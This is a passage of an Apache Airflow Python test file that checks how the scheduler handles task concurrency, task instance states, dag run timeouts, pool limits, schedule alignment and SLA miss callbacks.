self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
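# neither the dag concurrency nor the task_concurrency limit is reached yet,
# so both tis should be executable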
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances([], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# It is important that len(tasks) is less than the concurrency setting:
# scheduler._execute_task_instances used to check the task count only once,
# so with concurrency=3 arbitrarily many tasks could be executed in the
# second run.
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
# create the first dag run and set both of its task instances to RUNNING
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING], session=session))
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING, State.QUEUED], session=session))
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# It is important that len(tasks) is less than the concurrency setting:
# scheduler._execute_task_instances used to check the task count only once,
# so with concurrency=3 arbitrarily many tasks could be executed in the
# second run.
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob(**self.default_scheduler_args)
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
dag = DAG(
dag_id='test_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag2 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_dont_change',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag2,
owner='airflow')
dag3 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag3,
owner='airflow')
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.state = State.SCHEDULED
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
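# dag3 never got a dag run, so its ti should be reset to State.NONE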
dagbag = self._make_simple_dag_bag([dag, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti = dr.get_task_instance(task_id='dummy', session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.SCHEDULED)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr.refresh_from_db(session=session)
dr.state = State.FAILED
# persist the FAILED dag run so the next pass sees a dag run that is no longer running
session.merge(dr)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti.refresh_from_db(session=session)
self.assertEqual(ti.state, State.NONE)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
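# dr2 is a backfill run (BackfillJob.ID_PREFIX), so its ti should be left untouched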
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
processor.get_last_finish_time.return_value = None
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler._execute_helper(processor_manager=processor)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob(**self.default_scheduler_args)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob(**self.default_scheduler_args)
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run, since we want to see whether
# the dagrun stays in a running state despite having an unfinished task.
session = settings.Session()
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
scheduler = SchedulerJob(dag_id,
num_runs=2,
**self.default_scheduler_args)
scheduler.run()
# zero tasks ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there.
# That behavior still exists, but now only for runs after the start date.
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
scheduler = SchedulerJob(dag_id,
num_runs=2,
**self.default_scheduler_args)
scheduler.run()
# still one task
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
file_process_interval=0,
processor_poll_interval=0.5,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
dag_task2 = DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = mock.Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test that a dagrun will not be scheduled if max_active_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test that a dagrun will be set to failed if it times out
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test that a dagrun will not be scheduled if max_active_runs has been reached and dagrun_timeout has not been reached.
Test that a dagrun will be scheduled if max_active_runs has been reached but dagrun_timeout has also been reached.
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as the DagRun has not timed out and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = mock.Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
)
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
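# the pool has a single slot, so only one of the two scheduled tis can be queued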
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
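# 10:10 does not fall on the '4 5 * * *' schedule, so the first run is
# aligned to the next schedule point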
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
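# the start_date falls exactly on the '10 10 * * *' schedule, so the first
# execution_date equals the start_date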
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
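# clear the queue to simulate the task never being picked up by the executor;
# it should be queued again on the next scheduler run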
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = mock.MagicMock()
# Create a dag starting 2 days ago with an sla of 1 day, so an sla_miss is already on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
